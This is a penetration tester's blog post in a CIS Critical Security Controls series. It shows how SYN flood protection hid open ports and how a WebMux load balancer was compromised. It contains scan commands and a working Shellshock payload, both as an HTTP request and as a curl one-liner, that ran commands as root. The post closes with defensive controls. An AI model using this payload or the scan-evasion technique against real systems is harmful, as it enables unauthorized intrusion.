Top 20 CIS Critical Security Controls (CSC) Through the Eyes of a Hacker – CSC 9
In this blog series, members of Optiv's attack and penetration team are covering the top 20 Center for Internet Security (CIS) Critical Security Controls (CSC), showing an attack example and explaining how the control could have prevented the attack from succeeding. Please read the previous posts covering:
- CSC 1: Inventory of Authorized and Unauthorized Devices
- CSC 2: Inventory of Authorized and Unauthorized Software
- CSC 3: Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations, and Servers
- CSC 4: Continuous Vulnerability Assessment and Remediation
- CSC 5: Controlled Use of Administrative Privileges
- CSC 6: Maintenance, Monitoring, and Analysis of Audit Logs
- CSC 7: Email and Web Browser Protections
- CSC 8: Malware Defenses
CSC 9: Limitation and Control of Network Ports, Protocols and Services
The Control
Manage (track/control/correct) the ongoing operational use of ports, protocols and services on networked devices in order to minimize windows of vulnerability available to attackers.
The Attack
Attack surfaces are composed of the various endpoints and services that are accessible to external users. Although they are designed for use by authorized parties, malicious users could potentially gain unauthorized access through any available service. As such, one of the most effective means of mitigating risk exposure is through minimization of the available attack surface.
Unfortunately, organizations routinely create undue risk on perimeter-facing assets through unnecessary host and/or service accessibility. Superfluous network services can arise for a variety of reasons, including poorly defined or non-existent audit standards, security programs, or change management processes, as well as simple human error. Small firms generally lack the resources to support full-time security staff, while large-scale enterprises often struggle to secure external systems due to compatibility requirements, operational objectives or the sheer scale of their perimeter network footprint.
Businesses should use layered perimeter defenses such as application-aware firewalls, network access controls and intrusion detection/prevention systems to avert unauthorized access. However, some perimeter defenses, such as SYN flood protection, can reduce risk exposure while simultaneously providing a false sense of security. In the attack below, I will demonstrate why a defense-in-depth approach is critical to securing an organization’s network perimeter.
On a recent engagement, I encountered the following results from a quick Nmap scan:
desktop:~# nmap -T4 63.***.***.***
Starting Nmap 6.49BETA2 ( http://nmap.org ) at 2016-06-20 16:43 CDT
Nmap scan report for 63.***.***.***
Host is up (0.053s latency).
PORT STATE SERVICE
1/tcp open tcpmux
3/tcp open compressnet
4/tcp open unknown
6/tcp open unknown
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
20/tcp open ftp-data
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
24/tcp open priv-mail
<output truncated; every port in the default scan was reported open>
Nmap done: 1 IP address (1 host up) scanned in 0.98 seconds
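Every port in the default scan came back open, which is the classic signature of SYN flood protection: the device in front of the host completes the handshake on its behalf regardless of whether a real service is listening. A quick way to confirm the behavior is to probe a handful of improbable ports and ask Nmap why it considers them open; the command below is illustrative, with the port list chosen arbitrarily and 192.0.2.10 standing in for the masked address.
# Probe a few ports unlikely to host real services and have Nmap report the
# packet that produced each verdict (--reason). If arbitrary ports all show
# "open ... syn-ack", a flood-protection device is answering for the host.
nmap -Pn --reason -p 4444,17123,33333,54321,61000 192.0.2.10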
Attempts to run automated vulnerability scanners against this target would time out, fail to enumerate services, and generally return flawed or invalid data. The client was under the impression that malicious activity would be thwarted, because their in-house automated vulnerability scans had failed to identify any exploitable vulnerabilities.
However, SYN flood protection can be circumvented through inspection of the TCP flags returned for any given connection attempt. In this instance, I used Cookiescan to inspect TCP flags and identify services that were actually accessible from public networks.
desktop:~# ./cookiescan -p $(cat nmap-top-tcp-csv) -i eth0.1581 -t 500 -g 50 63.***.***.***
4m30s [=======================================================] 100%
Host: 63.***.***.***
Port State Service Confidence Reason
24 open unknown 3 [[ack] [ack] [fin ack]]
35 open unknown 1 [ack]
77 open unknown 2 [[ack] [ack]]
87 open unknown 3 [[ack] [ack] [fin ack]]
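The Reason column reflects the TCP flags Cookiescan saw coming back from each port after the handshake, which is what separates real listeners from ports the protection device answers on its own: a genuine service keeps talking (ACKs, data, an orderly FIN), while a faked port goes silent or is torn down immediately. A crude approximation of the same idea with standard tools is sketched below; the port list, timeout and 192.0.2.10 placeholder are illustrative.
# Complete a full handshake on each candidate port, send a short probe and
# wait briefly. Ports answered only by the flood-protection device are
# typically reset or closed almost at once, while a real listener (SSH,
# Telnet, HTTP) returns a banner or at least holds the connection open.
for port in 24 35 77 87 4444; do
    echo "--- port $port ---"
    printf 'probe\r\n\r\n' | timeout 5 nc -v 192.0.2.10 "$port"
done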
The four services identified by Cookiescan were listening on non-standard ports and could only be partially identified through targeted port scans.
desktop:~# nmap -sV 63.***.***.*** -p 24,35,77,87 -T4 --version-intensity=0
Starting Nmap 6.49BETA2 ( http://nmap.org ) at 2016-06-21 12:57 CDT
Service scan Timing: About 100.00% done; ETC: 12:57 (0:00:00 remaining)
Nmap scan report for 63.***.***.***
Host is up (0.053s latency).
PORT STATE SERVICE VERSION
24/tcp open priv-mail?
35/tcp open priv-print?
77/tcp open ssh OpenSSH 6.0 (protocol 2.0)
87/tcp open telnet Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.76 seconds
SSH and Telnet could be subjected to password guessing attacks or potentially disclose credentials through man-in-the-middle attacks; however, 24/TCP and 35/TCP piqued my curiosity because Nmap could not immediately identify them. HTTP and HTTPS are two of the most common services exposed on perimeter systems, and manual inspection revealed that 24/TCP was HTTP while 35/TCP was HTTPS.
desktop:~# curl 63.***.***.***:24 -vv
* About to connect() to 63.***.***.*** port 24 (#0)
* Trying 63.***.***.***... connected
> GET / HTTP/1.1
> User-Agent: curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3
> Host: 63.***.***.***:24
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Tue, 21 Jun 2016 18:03:03 GMT
< Server: Apache
< Expires: -1
< Pragma: no-cache
< Cache-Control: no-cache
< Connection: close
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=utf-8
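The listener on 35/TCP follows the same pattern, only wrapped in TLS. Repeating the probe over HTTPS, or pointing openssl at the port, is enough to confirm the protocol and retrieve the page; the commands below are illustrative, with 192.0.2.10 standing in for the masked address.
# -k skips certificate validation, which is routinely necessary for appliance
# management interfaces that present self-signed certificates.
curl -k -v https://192.0.2.10:35/
# openssl confirms that the port speaks TLS and shows the certificate the
# device presents.
openssl s_client -connect 192.0.2.10:35 </dev/null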
Additional inspection revealed that the SSL listener on 35/TCP was actually a login page for a production load balancer.
I researched the device and found WebMux load balancer documentation that contained default credentials. Although the default credentials did not permit access, the documentation revealed that a CGI-enabled status page was accessible without authentication. Given the copyright date, target operating system and lack of security updates, I manually tested for Shellshock (CVE-2014-6271).
HTTP Request:
GET /cgi-bin/about HTTP/1.1
Host: 63.***.***.***:35
Accept: */*
Accept-Language: en
User-Agent: () { :; }; /bin/bash -c 'id'
Connection: close
Referer: https://63.***.***.***:35/cgi-bin/about
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
HTTP Response:
<td>
WebMux version 9.1.00 built Jul 12 2012 12:36:35<br>
patch level: none<br>
model: WebMux (part number 592SGQ) <br>
serial number: ************ manufactured Oct ** ****<br>
CPU speed: uid=0(root) MHz<br>
CPUs: uid=0(root)<br>
total memory: uid=0(root) k<br>
configured as: one-armed single network (with SNAT)<br>
</td>
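For reference, the same test can be reproduced with a single curl request; the command below is illustrative, with 192.0.2.10 standing in for the masked address.
# The function definition in the User-Agent header is the Shellshock trigger.
# If the output of the injected command (here, `id`) appears in the response
# body, the CGI handler executed attacker-controlled code.
curl -k "https://192.0.2.10:35/cgi-bin/about" \
     -H "User-Agent: () { :; }; /bin/bash -c 'id'" \
     -H "Referer: https://192.0.2.10:35/cgi-bin/about"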
The load balancer's web interface was vulnerable to Shellshock and was running as the root user. I exploited the flaw to gain access to the system, pivot into other DMZ hosts, and eventually obtain access to internal network segments.
The Solution
CSC controls are intended to be applied as part of a defense-in-depth approach. CSC 9 involves more than just perimeter firewalls: it encompasses endpoint firewalls, routine port scans to verify configurations, removal of unnecessary services and systems, segmentation of critical services across discrete systems, and application-layer firewalls.
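Routine port scans are only useful if the results are actually compared against an expected baseline. One lightweight way to do that is to schedule an external scan and diff each run against the last known-good state; the sketch below is illustrative, using ndiff (which ships with Nmap) and placeholder file names and address range.
# Scan the external range, write XML output, and report anything that has
# changed (new hosts, ports or service versions) since the approved baseline.
nmap -Pn -sS -sV --top-ports 1000 -oX scan-$(date +%F).xml 192.0.2.0/24
ndiff scan-baseline.xml scan-$(date +%F).xml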
Although the client changed default credentials, segmented critical services and performed routine port scans, they failed to remove unnecessary services, apply patches or restrict access to management functionality through firewall access control lists. Management services such as Remote Desktop, SSH and web-based administrative functionality should be protected behind IP-based access control restrictions and only accessible from trusted hosts or network segments. In this instance, the load balancer itself was in active use and routinely scanned for vulnerabilities but didn’t appear critically vulnerable based on automated testing results.
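Where management interfaces must remain reachable across the perimeter, a host-based or perimeter ACL that restricts them to a trusted administrative range removes most of the exposure. A minimal iptables sketch follows, assuming a hypothetical management subnet of 10.10.20.0/24 and the load balancer's web interface on 35/TCP.
# Allow the management interface only from the administrative subnet and
# drop everything else destined for that port.
iptables -A INPUT -p tcp --dport 35 -s 10.10.20.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 35 -j DROP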
As demonstrated, over-reliance on automated tools and scanning engines can lead to unintended risk exposure. It is important for organizations to not only monitor and restrict service accessibility but also verify that testing mechanisms accurately validate control and process effectiveness.
The next post will cover CSC 10: Data Recovery Capability.